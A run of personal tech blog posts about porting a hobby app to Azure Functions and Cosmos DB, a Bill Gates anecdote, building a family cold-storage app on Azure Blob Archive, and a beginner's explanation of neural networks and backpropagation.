Finally, the Azure portal “TLS/SSL settings” panel can be used to force all requests to use HTTPS. Not necessary for this app but a nice touch.

All of this seems pretty obscure, but for once I’m inclined to give Microsoft a break. Functions really aren’t meant to implement websites — they have Azure Web Apps and Static Web Apps for that. In this case, I just preferred the Functions model — so the weird configuration is on me.

Moving to Cosmos

I’m a little less sanguine about the challenges I had changing the storage model from a simple directory of files to Cosmos DB. I mean, the final product is really quite simple and works well, so that’s cool. But once again I ran into lazy client library issues and random inconsistencies all along the way.

There are a bunch of ways to use Cosmos, but at heart it’s just a super-scalable NoSQL document store. Honestly I don’t really understand the pedigree of this thing — back in the day “Cosmos” was the in-house data warehouse used to do analytics for Bing Search, but that grew up super-organically with a weird, custom batch interface. I can’t imagine that the public service really shares code with that dinosaur, but as far as I can tell it’s not a fork of any of the big open source NoSQL projects either. So where did it even come from — ground up? Yeesh, only at Microsoft.

Anyhoo, after creating a Cosmos “account” in the Azure portal, it’s relatively easy to create databases (really just namespaces) and containers within them (more like what I could consider databases, or maybe big flexible partitioned tables). Containers hold items which natively are just JSON documents, although they can be made to look like table rows or graph elements with the different APIs.

Access using a Managed Identity

One of the big selling points (at least for me) of using Azure for distributed systems is its support for managed identities. Basically each service (e.g., my Function App) can have its own Active Directory identity, and this identity can be given rights to access other services (e.g., my Cosmos DB container). These relationships completely eliminate the need to store and manage service credentials — everything just happens transparently without any of the noise or risk that comes with traditional service-to-service authentication. It’s beautiful stuff.

Of course, it can be a bit tricky to make this work on dev machines — e.g., the Azure Function App emulator doesn’t know squat about managed identities (it has all kinds of other problems too but let’s focus here). The best (and I think recommended?) approach I’ve found is to use the DefaultAzureCredentialBuilder to get an auth token. The pattern works like this:

  1. In the cloud, configure your service to use a Managed Identity and grant access using that.
  2. For local development, grant your personal Azure login access to test resources — then use “az login” at the command-line to establish credentials on your development machine.
  3. In code, let the DefaultAzureCredential figure out what kind of token is appropriate and then use that token for service auth.

The DefaultAzureCredential iterates over all the various and obtuse authentication types until it finds one that works — with production-class approaches like ManagedIdentityCredential taking higher priority than development-class ones like AzureCliCredential. Net-net it just works in both situations, which is really nice.

Unfortunately, admin support for managed identities (or really any role-based access) with Cosmos is just stupid. There is no way to set it up using the portal — you can only do it via the command line with the Azure CLI or Powershell. I’ve said it before, but this kind of thing drives me absolutely nuts — it seems like every implementation is just random. Maybe it’s here, maybe it’s there, who knows … it’s just exhausting and inexcusable for a company that claims to love developers. But whatever, here’s a snippet that grants an AD object read/write access to a Cosmos container:

az cosmosdb sql role assignment create \
       --account-name 'COSMOS_ACCOUNT' \
       --resource-group 'COSMOS_RESOURCE_GROUP' \
       --scope '/dbs/COSMOS_DATABASE/colls/COSMOS_CONTAINER' \
       --principal-id 'MANAGED_IDENTITY_OR_OTHER_AD_OBJECCT' \
       --role-definition-id '00000000-0000-0000-0000-000000000002'

The role-definition id there is a built-in CosmosDB “contributor” role that grants read and write access. The “scope” can be omitted to grant access to all databases and containers in the account, or just truncated to /dbs/COSMOS_DATABASE for all containers in the database. The same command can be used with your Azure AD account as the principal-id.

Client Library Gotchas

Each Cosmos Container can hold arbitrary JSON documents — they don’t need to all use the same schema. This is nice because it meant I could keep the “channel” and “playlist” objects in the same container, so long as they all had unique identifier values. I created this identifier by adding an internal “id” field on each of the objects in Model.java — the analog of the unique filename suffix I used in the original version.

The base Cosmos Java API lets you read and write POJOs directly using generics and the serialization capabilities of the Jackson JSON library. This is admittedly cool — I use the same pattern often with Google’s Gson library. But here’s the rub — the library can’t serialize common types like the ones in the java.time namespace. In and of itself this is fine, because Jackson provides a way to add serialization modules to do the job for unknown types. But the recommended way of doing this requires setting values on the ObjectMapper used for serialization, and that ObjectMapper isn’t exposed by the client library for public use. Well technically it is, so that’s what I did — but it’s a hack using stuff inside the “implementation” namespace:

log.info("Adding JavaTimeModule to Cosmos Utils ObjectMapper");
com.azure.cosmos.implementation.Utils.getSimpleObjectMapper().registerModule(new JavaTimeModule());

Side node: long after I got this working, I stumbled onto another approach that uses Jackson annotations and doesn’t require directly referencing private implementation. That’s better, but it’s still a crappy, leaky abstraction that requires knowledge and exploitation of undocumented implementation details. Do better, Microsoft!

Pop the Stack

Minor tribulations aside, ShutdownRadio is now happily running in Azure — so mission accomplished for this post. And when I look at the actual code delta between this version and the original one, it’s really quite minimal. Radio.java, YouTube.java and player.html didn’t have to change at all. Model.java took just a couple of tweaks, and I could have even avoided those if I were being really strict with myself. Not too shabby!

Now it’s time to pop this task off of the stack and get back to the business of learning about bots. Next stop, ShutdownRadio in Teams …and maybe Skype if I’m feeling extra bold. Onward!

Refine your search for “gunshot wound”

I tend to be a mostly forward-looking person, but there’s nothing like a bit of nostalgia once in awhile.

After finally putting together a pretty solid cold storage solution for the family, I spent a little time going through my own document folders to see if there was anything there I really didn’t want to lose. The structure there is an amusing recursive walk through the last fifteen years of my career — each time I get a new laptop I just copy over my old Documents folder, so it looks like this:

  • seanno99 – Documents
    • some files
    • seanno98 – Documents
      • some files
      • seanno97 – Documents
        • some files
        • seanno96 – Documents
          • etc.

Yeah of course there are way better ways to manage this. But the complete lack of useful organization does set the stage for some amusing archeological discoveries. Case in point, last night I stumbled across a bunch of screen mocks for the service that ultimately became the embedded “Health Answer” in Bing Search (this was a long time ago, I don’t know if they still call them “Answers” or not, and I’m quite sure the original code is long gone).

One image in particular brought me right back to a snowy day in Redmond, Washington — one of my favorite memories in a luck-filled career full of great ones, probably about nine months before the mock was created.

Back then, the major engines didn’t really consider “health” to be anything special. This was true of most specialized domains — innovations around generalized search were coming so hot and heavy that any kind of curation or specialized algorithms just seemed like a waste of time. My long-time partner Peter Neupert and I believed that this was a mistake, and that “health” represented a huge opportunity for Microsoft both in search and elsewhere. There was a bunch of evidence for this that isn’t worth spending time on here — the important part is that we were confident enough to pitch Microsoft on creating a big-time, long-term investment in the space. I’m forever thankful that I was introduced to Peter way back in 1998; he has a scope of vision that I’ve been drafting off for a quarter century now.

Anyways, back in the late Fall of 2005 we were set to pitch this investment to Steve and Bill. The day arrives and it turns out that the Northwest has just been hit by a snowstorm — I can’t find a reference to the storm anywhere online, so it was probably something lame like six inches, but that’s more than enough to knock out the entire Seattle area. There is no power on the Microsoft campus and most folks are hiding in their homes with a stock of fresh water and canned soup. But Steve and Bill apparently have a generator in their little office kingdom, so we’re on. Somebody ran an extension cord into the conference room and set up a few lights, but there’s this great shadowy end-of-the-world vibe in the room — sweet. So we launch into our song and dance, a key part of which is the importance of health-specific search.

And here comes Bill. Now, he has gotten a lot of sh*t in the press lately, and I have no reason to question the legitimacy of the claims being made. This bums me out, because Bill Gates is one of the very few people in the world that I have been truly impressed by. He is scary, scary smart — driven by numbers and logic, and just as ready to hear that he’s an idiot as he is to tell you that you are. For my purposes here, I choose to remember this Bill, the one I’ve gotten to interact with.

“This is the stupidest idea I have ever heard.”

Bill dismisses the entire idea that people would search for issues related to their health. He expresses this with a small one-act play: “Oh, oh, I’ve been shot!” — he clutches his chest and starts dragging himself towards the table — “I don’t know what to do, let me open up my computer” — he stumbles and hauls himself up to the laptop — “No need for the ER, I’ll just search for ‘gunshot wound’” — sadly he collapses before he can get his search results. And, scene.

Suffice to say that backing down is not the right way to win a debate with Bill. I remember saying something that involved the words “ridiculous” and “bullsh*t” but that’s it — I was in The Zone. Fast forward about a week, the snow melted and Peter did some background magic and our funding was in the bag.

A few months later, we ended up buying a neat little company called Medstory that had created an engine dedicated to health search. And thus were born the “HealthVault Search” mocks that I found deep in the depths of my archives the other day. The best part? If you’ve looked at the image, you already know the punch line: GUNSHOT WOUND was immortalized as the go-to search phrase for the first image presented — every meeting, every time.

Bing!

Cold Storage on Azure

As the story goes, Steve Jobs once commissioned a study to determine the safest long-term storage medium for Apple’s source code. After evaluating all the most advanced technologies of the day (LaserDisc!), the team ended up printing it all out on acid-free paper to be stored deep within the low-humidity environment at Yucca Mountain — the theory being that our eyes were the most likely data retrieval technology to survive the collapse of civilization. Of course this is almost certainly false, but I love it anyways. Just like the (also false) Soviet-pencils-in-space story, there is something very Jedi about simplicity outperforming complexity. If you need me, I’ll be hanging out in the basement with Mike Mulligan and Mary Anne.

Image credit Wikipedia

Anyways, I was reminded of the Jobs story the other day because long-term data storage is something of a recurring challenge in the Nolan household. In the days of hundreds of free gigs from consumer services, you wouldn’t think this would be an issue, and yet it is. In particular my wife takes a billion pictures (her camera takes something like fifty shots for every shutter press), and my daughter has created an improbable tidal wave of video content.

Keeping all this stuff safe has been a decades-long saga including various server incarnations, a custom-built NAS in the closet, the usual online services, and more. They all have fatal flaws, from reliability to cost to usability. Until very recently, the most effective approach was a big pile of redundant drives in a fireproof safe. It’s honestly not a terrible system; you can get 2TB for basically no money these days, so keeping multiple copies of everything isn’t a big deal. Still not great though — mean time to failure for both spinning disks and SSD remains sadly low — so we need to remember to check them all a couple of time each year to catch hardware failures. And there’s always more. A couple of weeks ago, as my daughter’s laptop was clearly on the way out, she found herself trying to rescue yet more huge files that hadn’t made it to the safe.

Enter Glacier (and, uh, “Archive”)

It turns out that in the last five years or so a new long-term storage approach has emerged, and it is awesome.

Object (file) storage has been a part of the “cloud” ever since there was a “cloud” — Amazon calls their service S3; Microsoft calls theirs Blob Storage.  Conceptually these systems are quite simple: files are uploaded to and downloaded from virtual drives (“buckets” for Amazon, “containers” for Azure) using more-or-less standard web APIs. The files are available to anyone anywhere that has the right credentials, which is super-handy. But the real win is that files stored in these services are really, really unlikely to be lost due to hardware issues. Multiple copies of every file are stored not just on multiple drives, but in multiple regions of the world — so they’re good even if Lex Luthor does manage to cleave off California into the ocean (whew). And they are constantly monitored for hardware failure behind the scenes. It’s fantastic.

But as you might suspect, this redundancy doesn’t come for free. Storing a 100 gigabyte file in “standard” storage goes for about $30 per year (there are minor differences between services and lots of options that can impact this number, but it’s reasonably close), which is basically the one-and-done cost of a 2 terabyte USB stick! This premium can be very much worth it for enterprises, but it’s hard to swallow for home use.

Ah, but wait. These folks aren’t stupid, and realized that long-term “cold” storage is its own beast. Once stored, these files are almost never looked at again — they just sit there as a security blanket against disaster. By taking them offline (even just by turning off the electricity to the racks), they could be stored much more cheaply, without sacrificing any of the redundancy. The tradeoff is only that if you do need to read the files, bringing them back online takes some time (about half a day generally) — not a bad story for this use case. Even better, the teams realized that they could use the same APIs for both “active” and “cold” file operations — and even move things between these tiers automatically to optimize costs in some cases.

Thus was born Amazon Glacier and the predictably-boringly-named Azure Archive Tier. That same 100GB file in long-term storage costs just $3.50 / year … a dramatically better cost profile, and something I can get solidly behind for family use. Woo hoo!

But Wait

The functionality is great, and the costs are totally fine. So why not just let the family loose on some storage and be done with it? As we often discover, the devil is in the user experience. Both S3 and Blob Service are designed as building blocks for developers and IT nerds — not for end users. The native admin tools are a non-starter; they exist within an uber-complex web of cloud configuration tools that make it very easy to do the wrong thing. There are a few hideously-complicated apps that all look like 1991 FTP clients. And there are a few options for using the services to manage traditional laptop backups, but they all sound pretty sketchy and that’s not our use case here anyways.

Sounds like a good excuse to write some code! I know I’m repeating myself but … whether it’s your job or not, knowing how to code is the twenty-first century superpower. Give it a try.

The two services are basically equivalent; I chose to use Azure storage because our family is already deep down the Microsoft rabbit hole with Office365. And this time I decided to bite the bullet and deploy the user-facing code using Azure as well — in particular an Azure Static Web App using the Azure Storage Blob client library for JavaScript. You can create a “personal use” SWA for free, which is pretty sweet. Unfortunately, Microsoft’s shockingly bad developer experience strikes again and getting the app to run was anything but “sweet.” At its height my poor daughter was caught up in a classic remote-IT-support rodeo, which she memorialized in true Millennial Meme form.

Anyhoo — the key features of an app to support our family use case were pretty straightforward:

  1. Simple user experience, basically a “big upload button”.
  2. Login using our family Office365 accounts (no new passwords).
  3. A segregated personal space for each user’s files.
  4. An “upload” button to efficiently push files directly into the Archive tier.
  5. A “thaw” button to request that a file be copied to the Cool tier so it can be downloaded.
  6. A “download” button to retrieve thawed files.
  7. A “delete” button to remove files from either tier.

One useful feature I skipped — given that the “thawing” process can take about fifteen hours, it would be nice to send an email notification when that completes. I haven’t done this yet, but Azure does fire events automatically when rehydration is complete — so it’ll be easy to add later.

For the rest of this post, we’ll decisively enter nerd-land as I go into detail about how I implemented each of these. Not a full tutorial, but hopefully enough to leave some Google crumbs for folks trying to do similar stuff. All of the code is up on github in its own repository; feel free to use any of it for your own purposes — and let me know if I can help with anything there.

Set up the infrastructure

All righty. First you’ll need an Azure Static Web App. SWAs are typically deployed directly from github; each time you check in, the production website will automatically be updated with the new code. Set up a repo and the Azure SWA using this quickstart (use the personal plan). Your app will also need managed APIs — this quickstart shows how to add and test them on your local development machine. These quickstarts both use Visual Studio Code extensions — it’s definitely possible to do all of this without VSCode, but I don’t recommend it. Azure developer experience is pretty bad; sticking to their preferred toolset at least minimizes unwelcome surprises.

You’ll also need a Storage Account, which you can create using the Azure portal. All of the defaults are reasonable, just be sure to pick the “redundancy” setting you want (probably “Geo-redundant storage”). Once the account has been created, add a CORS rule (in the left-side navigation bar) that permits calls from your SWA domain (you’ll find this name in the “URL” field of the overview page for the SWA in the Azure portal).

Managing authentication with Active Directory

SWAs automatically support authentication using accounts from Active Directory, Github or Twitter (if you choose the “standard” pricing plan you can add your own). This is super-nice and reason alone to use SWA for these simple little sites — especially for my case where the users in question are already part of our Azure AD through Office365. Getting it to work correctly, though, is a little tricky.

Code in your SWA can determine the users’ logged-in status in two ways: (1) from the client side, make an Ajax call to the built-in route /.auth/me, which returns a JSON object with information about the user, including their currently-assigned roles; (2) from API methods, decode the x-ms-client-principal header to get the same information.

By default, all pages in a SWA are open for public access and the role returned will be “anonymous”. Redirecting a user to the built-in route /.auth/aad will walk them through a standard AD login experience. By default anyone with a valid AD account can log in and will be assigned the “authenticated” role. If you’re ok with that, then good enough and you’re done. If you want to restrict your app only to specific users (as I did), open up the Azure portal for your SWA and click “Role management” in the left-side navigation bar. From here you can “invite” specific users and grant them custom roles (I used “contributor”) — since only these users will have your roles, you can filter out the riff-raff.

Next you have to configure routes in the file staticwebapp.config.json in the same directory with your HTML files to enforce security. There’s a lot of ways to do this and it’s a little finicky because your SWA has some hidden routes that you don’t want to accidentally mess with. My file is here; basically it does four things:

  1. Allows anyone to view the login-related pages (/.auth/*).
  2. Restricts the static and api files to users that have my custom “contributor” role.
  3. Redirects “/” to my index.html page.
  4. Redirects to the AD auth page when needed to prompt login.

I’m sure there’s a cleaner way to make all this happen, but this works and makes sense to me, so onward we go.

Displaying files in storage

The app displays files in two tables: one for archived files (in cold storage) and one for active ones that are either ready to download or pending a thaw. Generating the actual HTML for these tables happens on the client, but the data is assembled at the server. The shared “Freezer” object knows how to name the user’s personal container from their login information and ensure it exists. The listFiles method then calls listBlobsFlat to build the response object.

There are more details on the “thawing” process below, but note that if a blob is in the middle of thawing we identify it using the “archiveStatus” property on the blob. Other than that, this is a pretty simple iteration and transformation. I have to mention again just how handy JSON is these days — it’s super-easy to cons up objects and return them from API methods.

Uploading

Remember the use case here is storing big files — like tens to hundreds of gigabytes big. Uploading things like that to the cloud is a hassle no matter how you do it, and browsers in particular are not known for their prowess at the job. But we’re going to try it anyways.

In the section above, the browser made a request to our own API (/api/listFiles), which in turn made requests to the Azure storage service. That works fine when the data packages are small, but when you’re trying to push a bunch of bytes, having that API “middleman” just doesn’t cut it. Instead, we want to upload the file directly from the browser to Azure storage. This is why we had to set up a CORS rule for the storage account, because otherwise the browser would reject the “cross-domain” request to https://STORAGE_ACCT.blob.core.windows.net where the files live.

no preflight cache for PUT, so sad

The same client library that we’ve been using from the server (node.js) environment will work in client-side JavaScript as well — sort of. Of course because it’s a Microsoft client library, they depend on about a dozen random npm packages (punycode, tough-cookie, universalify, the list goes on), and getting all of this into a form that the browser can use requires a “bundler.” They actually have some documentation on this, but it leaves some gaps — in particular, how best to use the bundled files as a library. I ended up using webpack to make the files, with a little index.js magic to expose the stuff I needed. It’s fine, I guess.

The upload code lives here in index.html. The use of a hidden file input is cute but not essential — it just gives us a little more control over the ux. Of course, calls to storage methods need to be authenticated; our approach is to ask our server to generate a “shared access signature” (SAS) token tied to the blob we’re trying to upload — which happens in freezer.js (double-duty for upload and download). The authenticated URL we return is tied only to that specific file, and only for the operations we need.

The code then calls the SDK method BlockBlobClient.uploadData to actually push the data. This is the current best option for uploading from the browser, but to find it you have to make your way there through a bunch of other methods that are either gone, deprecated or only work in the node.js runtime. The quest is worthwhile, though, because there is some good functionality tucked away in there that is key for large uploads:

  • Built in retries (we beef this up with retryOptions).
  • Clean cancel using an AbortController.
  • A differentiated approach for smaller files (upload in one shot) vs. big ones (upload in chunks).
  • When uploading in chunks, parallel upload channels to maximize throughput. This one is tricky — since most of us in the family use Chrome, we have to be aware of the built-in limitation of five concurrent calls to the same domain. In the node.js runtime it can be useful to set the “concurrency” value quite high, but in the browser environment that will just cause blocked requests and timeout chaos. This took me awhile to figure out … a little mention in the docs might be nice folks.

With all of this, uploading seems pretty reliable. Not perfect though — it still dies with frustrating randomess. Balancing all the config parameters is really important, and unfortunately the “best” values change depending on available upload bandwidth. I think I will add a helper so that folks can use the “azcopy” tool to upload as well — it can really crank up the parallelization and seems much less brittle with respect to network hiccups. Command-line tools just aren’t very family friendly, but for what it’s worth:

  1. Download azcopy and extract it onto your PATH.
  2. Log in by running azcopy login … this will tell you to open up a browser and log in with a one-time code.
  3. Run the copy with a command like azcopy cp FILENAME https://STORAGE_ACCT.blob.core.windows.net/CONTAINER/FILENAME --put-md5 --block-blob-tier=Archive.
  4. If you’re running Linux, handy to do #3 in a screen session so you can detach and not worry about logging out.

Thawing

Remember that files in the Archive tier can’t be directly downloaded — they need to be “rehydrated” (I prefer “thawed”) out of Archive first. There are two ways to do this: (1) just flip the “tier” bit to Hot or Cool to initiate the thaw, or (2) make a duplicate copy of the archived blob, leaving the original in place but putting the new one into an active tier. Both take the same amount of time to thaw (about fifteen hours), but it turns out that #2 is usually the better option for cold-storage use cases. The reason why comes down to cost management — if you move a file out of archive before it’s been there for 180 days, you are assessed a non-trivial financial penalty (equivalent to if you were using an active tier for storage the whole time). Managing this time window is a hassle and the copy avoids it.

So this should be easy, right? Just call beginCopyFromURL with the desired active tier value in the options object. I mean, that’s what the docs literally say to do, right?

Nope. For absolutely no reason that I can ascertain online, this doesn’t work in the JavaScript client library — it just returns a failure code. Classic 2020 Microsoft developer experience … things work in one client library but not another, the differences aren’t documented anywhere, and it just eats hour after hour trying to figure out what is going on via Github, Google and Stack Exchange. Thank goodness for folks like this that document their own struggles … hopefully this post will show up in somebody else’s search and help them out the same way.

Anyways, the only approach that seems to work is to just skip the client library and call the REST API directly. Which is no big deal except for the boatload of crypto required. Thanks to the link above, I got it working using the crypto-js npm module. I guess I’m glad to have that code around now at least, because I’m sure I’ll need it again in the future.

But wait, we’re still not done! Try as I might, the method that worked on my local development environment would not run when deployed to the server: “CryptoJS not found”. Apparently the emulator doesn’t really “emulate” very well. Look, I totally understand that this is a hard job and it’s impossible to do perfectly — but it is crystal clear that the SWA emulator was hacked together by a bunch of random developers with no PM oversight. Argh.

By digging super-deep into the deployment logs, it appeared that the Oryx build thingy that assembles SWAs didn’t think my API functions had dependent modules at all. This was confusing, since I was already dependent on the @azure/storage-blob package and it was working fine. I finally realized that the package.json file in the API folder wasn’t listing my dependencies. The same file in the root directory (where you must run npm install for local development) was fine. What the f*ck ever, man … duping the dependencies in both folders fixed it up.

Downloading and Deleting

The last of our tasks were to implement download and delete — thankfully, not a lot of surprises with these. The only notable bit is setting the correct Content-Type and Content-Disposition headers on download so that the files saved as downloaded files, rather than opening up in the browser or whatever other application is registered. Hooray for small wins!

That’s All Folks

What a journey. All in all it’s a solid little app — and great functionality to ensure our family’s pictures and videos are safe. But I cannot overstate just how disappointed I am in the Microsoft developer experience. I am particularly sensitive to this for two reasons:

First, the fundamental Azure infrastructure is really really good! It performs well, the cost is reasonable, and there is a ton of rich functionality — like Static Web Apps — that really reduce the cost of entry for building stuff. It should be a no-brainer for anyone looking to create secure, modern, performant apps — not a spider-web of sh*tty half-assed Hello World tutorials that stop working the day after they’re published.

Even worse for my personal blood pressure, devex used to be the crown jewel of the company. When I was there in the early 90s and even the mid 00s, I was really, really proud of how great it was to build for Windows. Books like Advanced Windows and Inside OLE were correct and complete. API consistency and controlled deprecation were incredibly important — there was tons of code written just to make sure old apps kept working. Yes it was a little insane — but I can tell you it was 100% sincere.

Building for this stuff today feels like it’s about one third coding, one third installing tools and dependencies, and one third searching Google to figure out why nothing works. And it’s not just Microsoft by any means — it just hurts me the most to see how far they’ve fallen. I’m glad to have fought the good fight on this one, but I think I need a break … whatever I write next will be back in my little Linux/Java bubble, thank you very much.  

Fake Neurons Are Cool

Back when I was in college, getting a Computer Science degree meant taking a bunch of somewhat advanced math courses. My math brain topped out at Calc2, so clearly I was going to have to work the system somehow. Thus was born my custom-made “Cognitive Science” degree, a combination of the cool parts of Psychology with the cool parts of CS. Woot! My advisor in the degree was Jamshed Bharucha, who has done a ton of really cool work trying to understand how we perceive music.

In retrospect it was an awesome time to be learning about artificial intelligence. Most approaches still didn’t work very well (except in limited domains). The late-80s hype around expert systems had petered out, and the field overall was pretty demoralized. But blackboards and perceptrons were still bopping around, and I was particularly enamored with the stuff that Rodney Brooks (eventually of Roomba fame) was doing. What was great for a student was that all of these ideas were still relatively simple — you could intuitively talk about how they worked, and the math was approachable enough that you could actually implement them. Today it’s much harder to develop that kind of intuition from first principles, because everything is about mind-numbing linear algebra and layer upon layer of derivatives (on the other hand, today the algorithms actually work I guess).

Most notably for me, the classic 1986 backpropagation paper by Rumelhart / Hinton / Williams was just gaining traction as I was learning all of this. Backprop basically restarted the entire field and, coupled with Moore’s Law, set the stage for the pretty incredible AI performance we take for granted today. Dr. Bharucha saw this happening, and tapped me to write a graphical neural net simulator on the Mac that we used to teach classes. Sadly, while you can still find a few osbscure mentions of DartNet around the web (including a tiny screenshot), it seems that the code is lost — ah well.

Nostalgia aside, I have been noodling an idea for a project that would require a network implementation. There are a metric ton of really, really good open source options to choose from, but I realized I didn’t really remember the details how it all worked, and I don’t like that. So with the help of the original paper and some really nice, simple reference code I set about to get refreshed, and figured that others might enjoy a “101” as well, so here we go.

Real Neurons are Really Cool

We do our thinking thanks to cells called Neurons. In combination they are unfathomably complex, but individually they’re pretty simple, at least at a high level. Neurons basically have three parts:

image credit w/thanks to Wikimedia
  1. The cell body or soma, which holds the nucleus and DNA and is a lot like like any other cell.
  2. Dendrites, branching tendrils which extend from the cell body and receive signals from other cells.
  3. The axon, a (usually) single long extension from the cell body that sends signals to other cells.

Neurons are packed together so that axons from some neurons are really close to dendrites from others. When a neuron is “activated”, its axon releases chemicals called neurotransmitters, which travel across the gap (called a synapse) to nearby dendrites. When those dendrites sense neurotransmitters, they send an electrical pulse up towards their cell body. If enough dendrites do this at the same time, that neuron also “activates”, sending the pulse up the axon which responds by releasing more neurotransmitters. And she tells two friends, and she tells two friends… and suddenly you remember your phone number from 1975.

It doesn’t quite work this way, but imagine you’ve got a neuron in your head dedicated to recognizing Ed Sheeran. Dendrites from this neuron might be connected to axons from the neuron that recognizes redheads, and the one for Cherry Seaborn, and the one for British accents, and dozens of others. No single dendrite is enough to make the Ed Sheeran neuron fire; it takes a critical mass of these inputs firing at the same time to do the job. And some dendrites are more important than others — the “shabbily dressed” neuron probably nudges you towards recognizing Ed, but isn’t nearly as powerful as “hearing Galway Girl”.

Pile up enough neurons with enough connections and you end up with a brain. “Learning” is just the process of creating synapses and adjusting their strengths. All of our memories are encoded in these things too. They’re why I think of my grandparents’ house every time I smell petrichor, and why I start humming Rocky Mountain High whenever I visit Overlake Hospital. It’s just too freaking amazing.

Fake Neurons

People have been thinking about how to apply these concepts to AI since the 1940s. That evolution itself is fascinating but a bit of a side trip. If we fast-forward to the early 1980s, the state of the art was more-or-less represented in Minsky and Papert’s book Perceptrons. In brief (and I hope I don’t mess this up too much):

  1. Coding a fake neuron is pretty easy.
  2. Coding a network of fake neurons is also pretty easy, albeit computationally intense to run.
  3. Two-layer, fully-connected networks that link “input” to “output” neurons can learn a lot of things by example, but their scope is limited.
  4. Multi-layer networks that include “hidden” neurons between the inputs and outputs can solve many more problems.
  5. But while we understood how to train the networks in #3, we didn’t know how to train the hidden connections in #4.

The difference between the networks in #3 and #4 is about “linearity”. Imagine your job is to sort a pile of random silverware into “forks” and “spoons”. Unfortunately, you discover that while many pieces are pretty obviously one or the other, there are also a bunch of “sporks” in the mix. How do you classify these sporkish things? One super-nerdy way would be to identify some features that make something “forky” vs. “spoony” and plot examples on a chart (hot tip: whenever you see somebody building “graphs” in PowerPoint as I’ve done here, you should generally assume they’re full of crap):

If we measure the “tine length” and “bowl depth” of each piece, we can plot it on this graph. And lo and behold, we can draw a straight line (the dotted one) across this chart to separate the universe quite accurately into forks and spoons. Sure, the true sporks in the lower-left are tough, as are weirdo cases like the “spaghetti fork” represented by the mischaracterized red dot on the right. But by and large, we’ve got a solid classifier here. The dividing line itself is pretty interesting — you can see that “tine length” is far more “important” to making the call than the bowl depth. This makes intuitive sense — I’ve seen a lot of shaped forks, but not a lot of spoons with long tines.

This kind of classification is called “linear regression,” and it is super-super-powerful. While it’s hard for us to visualize, it will work with any number of input parameters, not just two. If you imagine adding a third dimension (z axis)  to the chart above, a flat plane could still split the universe in two. A whole bunch of AI you see in the world is based on multi-dimensional linear classifiers (even the T-Detect COVID-19 test created by my friends at Adaptive).

But there are a bunch of things linear classifiers can’t do — a good example being complex image recognition (dog or fried chicken?). Enter the multi-layered neural network (#4 in the list above). Instead of straight lines, these networks can draw distinctions using complex curves and even disjoint shapes. Super-cool … except that back in the early 80s we didn’t know how to train them. Since carefully hand-crafting a network with thousands of connections is laughable, we were kind of stuck.

I already gave away the punchline — in 1986 some super-smart folks solved this dilemma with a technique they called “backpropagation.” But before we dig into that, let’s look a little more closely at how artificial neural nets are typically put together.

Network Layers and Forward Propagation

I alluded to the fact that our brains are generally a jumble of interconnected neurons. Some connections are predetermined, but most come about as we learn stuff about the world. The interconnectedness is massively complex — our artificial versions are much simpler, because we’re just not as smart as Nature. Still, there is a lot going on.

Fake neurons are arranged into “layers”, starting with the input layer. This input layer is where features (tine length, etc.) are presented to the system, usually as floating point numbers and ideally normalized to a consistent range like 0 to 1 (normalizing the inputs lets the network assess the importance of each feature on its own). The last layer in a network is the “output” layer, which is where we read out results. The output layer might be a single neuron that provides a yes/no answer; or it might be a set of neurons, each of which assesses the probability of the inputs representing a particular thing, or something in between.

In between these two layers is usually at least one “hidden” layer. The number of neurons in these layers is up to the network designers — and there aren’t a ton of “rules” about what will work best in any specific situation. This is true of most “hyperparameters” used to tune AI systems, and selection usually comes down somewhere between a random guess and trying a whole bunch to see what performs the best. And we think we’re so smart.

Every neuron in layer N is connected via an artificial synapse to every neuron in layer N + 1. The “strength” of each synapse is represented by a floating-point value called a “weight”. Generating an output from a given set of inputs is called a “forward pass” or “forward propagation” and works like this:

  1. Assign each input value to the input neurons.
  2. For each neuron N in the first hidden layer,
    1. For each neuron N’ in the layer below,
      1. Calculate the value sent from N’ to N by multiplying the value of N’ with the weight of the synapse between them.
    1. Sum these values together to get total input value for neuron N.
    1. Add the “bias” value of N to the sum. Intuitively this bias allows each neuron to have a “base level” importance to the system.  
    1. Apply an “activation” function to the sum to determine the final output value of N (see discussion of activation functions below).
  3. Repeat step 2 for each subsequent network layer until the output layer is reached.

Activation functions are interesting. In a very practical sense, we need to normalize the output values of each neuron — if we didn’t, the “sum” part of the algorithm would just keep growing with every layer. Using a non-linear function to perform that normalization enables the non-linear classification we’re trying to build. Remember that real neurons are binary — they either fire or they do not — a very non-linear operation. But artificial networks tend to use something like the sigmoid function (or actually ever more complicated ones these days) that have the added benefit of being efficient at a learning approach called gradient descent (I know, more terms … sorry, we’ll get there).

It’s hard to describe algorithms in English. Hopefully that all made sense, but said more simply: artificial neural networks arrange neurons in layers. Activation of the neurons at each layer is calculated by adding up the activations from the layer below, scaled by weights that capture the relative importance of each synapse. Functions transform these values into final activations that result in non-linear output values. That’s good enough.

Training the Network / Enter Backpropagation

Backprop is one of those algorithms that I can fight through with pen and paper and really understand for about five seconds before it’s lost again. I take some pride in those five seconds, but I wish I was better at retaining this stuff. Ah well — I can at least hold onto an intuitive sense of what is going on — and that’s what I’ll share here.

We can train a network by showing it a whole bunch of input samples where we know what the output should be (this is called supervised learning). The network is initialized with a set of totally random weights and biases, then a forward pass is done on the first sample. If we subtract the (pretty much random) outputs we get from the correct/expected results, we get an “error” value for each output node. Our goal is to use that error plus a technique called “gradient descent” to adjust the weights coming into the node so that the total error is smaller next time. Then we run the other samples the same way until the network either gets smart or we give up.

Gradient descent is a very simple idea. Considering one synapse (weight) in our network, imagine a chart like the one here that plots all the possible weight values against the errors they produce. Unless the error is totally unrelated to the weight (certainly possible but then it is all random and what’s the meaning of life anyways), you’ll end up with a curve, maybe one like the dotted line shown below. Our job is to find the weight value that minimizes error, so we’re trying to hit that lower trough where the green dot is.

If our initial random stab is the red dot, we want to move the weight “downhill” to the left. We don’t know how far, but we can see that the slope of the curve is pretty steep where we are, so we can take a pretty big step. But oops, if we go too far we end up missing the bottom and land somewhere like the gold dot. That’s ok — the slope is shallower now, so we’ll try again, taking a smaller step to the right this time. And we just keep doing that, getting closer and closer to the bottom where we want to be.

Alas, the big problem with gradient descent is represented by the purple dot, called a “local minimum”. If our initial random weight puts us near that part of the curve, we might accidentally follow it downhill to the purple and get “stuck” because the slope there is zero and we never take a big enough step to escape. There are various ways to minimize (ha) this problem, all of which amount in practice to jiggling the dot to try to and shake it loose. Fun stuff, but I’m just going to ignore it here.

